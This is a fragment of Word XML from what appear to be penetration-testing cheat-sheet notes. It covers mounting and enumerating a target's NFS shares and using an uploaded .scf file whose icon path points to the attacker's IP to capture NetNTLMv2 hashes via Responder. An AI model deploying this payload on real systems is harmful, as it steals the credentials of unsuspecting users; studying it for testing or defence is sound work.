            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1547B96A" w14:textId="74511866" w:rsidR="00624E45" w:rsidRPr="00AA366F" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>mount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BA0CE94" w14:textId="7710FEAD" w:rsidR="00624E45" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C714B0">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve">IF </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>YOU NEED TO MOUNT A TARGET IP’S NFS, AND YOU KNOW THE NAME OF THE SHARE, YOU CAN USE THE MOUNT COMMAND TO CONNECT DIRECTLY TO IT.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6321F102" w14:textId="77777777" w:rsidR="00624E45" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="39716008" w14:textId="77777777" w:rsidR="00624E45" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>First off, it’s probably best to create a directory for this mount:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B959BD">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00B959BD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> mkdir </w:t>
            </w:r>
            <w:r w:rsidRPr="00B959BD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/mnt/NAME</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39D36D07" w14:textId="77777777" w:rsidR="00624E45" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:r>
              <w:t>Then to mount the target NFS share we want to mount:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="508BDD21" w14:textId="77777777" w:rsidR="00624E45" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B959BD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">mount </w:t>
            </w:r>
            <w:r w:rsidRPr="00B959BD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET IP ADDRESS</w:t>
            </w:r>
            <w:r w:rsidRPr="00B959BD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00B959BD">
              <w:rPr>
                <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
              </w:rPr>
              <w:t xml:space="preserve">/TARGETSHARENAME </w:t>
            </w:r>
            <w:r w:rsidRPr="00B959BD">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>/mnt/NAME</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2102BB0D" w14:textId="00CEB74C" w:rsidR="00624E45" w:rsidRPr="00B959BD" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:r w:rsidRPr="00B959BD">
              <w:t>Check it’s worked using:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="587A9FED" w14:textId="4D94746E" w:rsidR="00624E45" w:rsidRPr="00B959BD" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B959BD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ls</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B959BD">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-al </w:t>
            </w:r>
            <w:r w:rsidRPr="00B959BD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/mnt/NAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00624E45" w14:paraId="14CF9E22" w14:textId="77777777" w:rsidTr="006E5135">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2A6ABEF7" w14:textId="55AD5DCC" w:rsidR="00624E45" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00EB0837">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5C2CDCF9" w14:textId="77777777" w:rsidR="00624E45" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pP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522AEB45" w14:textId="77777777" w:rsidR="00624E45" w:rsidRPr="00624E45" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:r w:rsidRPr="00624E45">
              <w:t>We can now use the cp command to copy a file of interest to somewhere else on our machine, this allows us to change its permissions to be able to read, write and execute:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49932077" w14:textId="77777777" w:rsidR="00624E45" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00624E45">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00624E45">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">TARGET_FILE </w:t>
            </w:r>
            <w:r w:rsidRPr="00624E45">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>~</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23D4C3A8" w14:textId="77777777" w:rsidR="00624E45" w:rsidRPr="00624E45" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00624E45">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00624E45">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>~</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40263518" w14:textId="496DFE20" w:rsidR="00624E45" w:rsidRPr="00624E45" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00624E45">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00624E45">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">chmod </w:t>
            </w:r>
            <w:r w:rsidRPr="00624E45">
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
              <w:t xml:space="preserve">666 </w:t>
            </w:r>
            <w:r w:rsidRPr="00624E45">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET_FILE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00624E45" w14:paraId="00F3D5F9" w14:textId="77777777" w:rsidTr="006E5135">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="515F11BC" w14:textId="14ADFCC7" w:rsidR="00624E45" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00EB0837">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="47383A41" w14:textId="066AC298" w:rsidR="00624E45" w:rsidRDefault="002A4790" w:rsidP="0006198D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nmap</w:t>
            </w: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690CF69A" w14:textId="77777777" w:rsidR="00624E45" w:rsidRDefault="002A4790" w:rsidP="0006198D">
            <w:r>
              <w:t>Remember, to find potential share names use nmap script engine:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="531FAB1A" w14:textId="5DC4C01B" w:rsidR="002A4790" w:rsidRPr="00624E45" w:rsidRDefault="002A4790" w:rsidP="0006198D">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002A4790">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap </w:t>
            </w:r>
            <w:r w:rsidRPr="002A4790">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">TARGET IP ADDRESS </w:t>
            </w:r>
            <w:r w:rsidRPr="002A4790">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002A4790">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>nfs-ls,nfs-statfs,nfs-showmount</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C76C45" w14:paraId="2BD9BEA8" w14:textId="77777777" w:rsidTr="0006198D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6CDE5F02" w14:textId="77777777" w:rsidR="00C76C45" w:rsidRDefault="00C76C45" w:rsidP="0006198D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="29EFD28E" w14:textId="77777777" w:rsidR="00C76C45" w:rsidRDefault="00C76C45" w:rsidP="0006198D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="706D4AC1" w14:textId="77777777" w:rsidR="00C76C45" w:rsidRPr="001E0F42" w:rsidRDefault="00C76C45" w:rsidP="0006198D"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21CFEE08" w14:textId="77777777" w:rsidR="00DE237F" w:rsidRDefault="00DE237F"/>
    <w:p w14:paraId="2437D6C1" w14:textId="77777777" w:rsidR="00DE237F" w:rsidRDefault="00DE237F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="519278D7" w14:textId="12DD2A8A" w:rsidR="00DE237F" w:rsidRDefault="00DE237F" w:rsidP="00DE237F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Using SCF File To Gather Hashes</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DE237F" w14:paraId="0EDB8DC7" w14:textId="77777777" w:rsidTr="001B52BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="457A3FFA" w14:textId="210E4636" w:rsidR="00DE237F" w:rsidRDefault="00DE237F" w:rsidP="001B52BB">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="002573B4">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7DF52079" w14:textId="118CE712" w:rsidR="00DE237F" w:rsidRPr="00AA366F" w:rsidRDefault="00DE237F" w:rsidP="001B52BB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>SCF File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2056256B" w14:textId="77777777" w:rsidR="00DE237F" w:rsidRPr="00DE237F" w:rsidRDefault="00DE237F" w:rsidP="001B52BB">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE237F">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF YOU CAN UPLOAD A FILE, TRY USING RESPONDER TO LISTEN FOR A RESPONSE WHEN YOU UPLOAD A .scf FILE.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11D233FA" w14:textId="58209726" w:rsidR="002573B4" w:rsidRDefault="00484576" w:rsidP="00DE334D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>SCF stands for a few different file types but most likely we’re using ‘Shell Command File’ for this exploit.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55214A47" w14:textId="47FC0A1C" w:rsidR="00F86ADC" w:rsidRPr="00F86ADC" w:rsidRDefault="00DE334D" w:rsidP="001B52BB">
            <w:r>
              <w:t>First</w:t>
            </w:r>
            <w:r w:rsidR="00F86ADC">
              <w:t>, use a text editor such as Sublime or Mousepad to create the SCF file, put this in:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F484F0A" w14:textId="77777777" w:rsidR="000908F3" w:rsidRPr="00394A24" w:rsidRDefault="000908F3" w:rsidP="000908F3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidRPr="00484576">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>[shell]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A21066">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>(It seems the minimum you need are [shell] and the</w:t>
            </w:r>
            <w:r w:rsidRPr="00A21066">
              <w:br/>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidRPr="000908F3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>command=2</w:t>
            </w:r>
            <w:r w:rsidRPr="00A21066">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A21066">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A21066">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>the iconfile=\\OUR.IP.ADD.RESS\)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="340CF386" w14:textId="77777777" w:rsidR="000908F3" w:rsidRPr="00484576" w:rsidRDefault="000908F3" w:rsidP="000908F3">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00484576">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>iconfile=\\OUR.IP.ADD.RESS\home\kali\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="409E2AC5" w14:textId="158E3280" w:rsidR="00F86ADC" w:rsidRPr="00B959BD" w:rsidRDefault="000908F3" w:rsidP="000908F3">
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00484576">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>[taskbar]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00484576">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>command=toggledesktop</w:t>
            </w:r>
            <w:r w:rsidRPr="00F86ADC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F86ADC" w:rsidRPr="00F86ADC">
              <w:t xml:space="preserve">Be sure to save this file as </w:t>
            </w:r>
            <w:r w:rsidR="00F86ADC" w:rsidRPr="00F86ADC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>@test.scf</w:t>
            </w:r>
            <w:r w:rsidR="00F86ADC" w:rsidRPr="00F86ADC">
              <w:t>, using the @ at the front.</w:t>
            </w:r>
            <w:r w:rsidR="00DE334D">
              <w:t xml:space="preserve"> It</w:t>
            </w:r>
            <w:r w:rsidR="00394A24">
              <w:t xml:space="preserve"> doesn’t matter if capital letters are used or not (at least when attacking a Window’s machine).</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Check out ‘Responder’ later on in the grey section for more.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE237F" w14:paraId="62B88928" w14:textId="77777777" w:rsidTr="001B52BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="17DAC657" w14:textId="44408A3D" w:rsidR="00DE237F" w:rsidRDefault="00DE237F" w:rsidP="001B52BB">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="002573B4">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3EF7B02D" w14:textId="77777777" w:rsidR="00DE237F" w:rsidRDefault="00DE237F" w:rsidP="001B52BB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pP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6C041264" w14:textId="77777777" w:rsidR="00DE237F" w:rsidRPr="00E23A49" w:rsidRDefault="000908F3" w:rsidP="001B52BB">
            <w:r w:rsidRPr="00E23A49">
              <w:t xml:space="preserve">I’m not entirely sure, but I think this exploit requires the user on the other end </w:t>
            </w:r>
            <w:r w:rsidR="00E23A49" w:rsidRPr="00E23A49">
              <w:t>to browse, find and open the file and as it’s an SCF file, it will be immediately executed.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3134445E" w14:textId="77777777" w:rsidR="00E23A49" w:rsidRDefault="00E23A49" w:rsidP="001B52BB">
            <w:r w:rsidRPr="00E23A49">
              <w:t>This is why the @ is important as it places the file at the top of the uploaded location.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5635A2EF" w14:textId="4AE0DF4F" w:rsidR="00E23A49" w:rsidRPr="00E23A49" w:rsidRDefault="00E23A49" w:rsidP="001B52BB">
            <w:r>
              <w:t>However, if place into the Public/Desktop folder, this is accessed every time any user logs in, thus when someone logs in, the icon will</w:t>
            </w:r>
            <w:r w:rsidR="00FE6F2C">
              <w:t xml:space="preserve"> be requested from our machine. Our machine issues a challenge request, and a challenger response is then returned to use with the NetNTLMv2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE237F" w14:paraId="111F4CC7" w14:textId="77777777" w:rsidTr="001B52BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5C72B7AB" w14:textId="675DDC67" w:rsidR="00DE237F" w:rsidRDefault="00DE237F" w:rsidP="001B52BB">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="002573B4">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="37FD09CA" w14:textId="2FE3ADD8" w:rsidR="00DE237F" w:rsidRDefault="00DE237F" w:rsidP="001B52BB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pP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5E4B7DA0" w14:textId="08F27A16" w:rsidR="00DE237F" w:rsidRPr="00624E45" w:rsidRDefault="00DE237F" w:rsidP="001B52BB"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE237F" w14:paraId="5DECC71A" w14:textId="77777777" w:rsidTr="001B52BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="78D13193" w14:textId="77777777" w:rsidR="00DE237F" w:rsidRDefault="00DE237F" w:rsidP="001B52BB"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
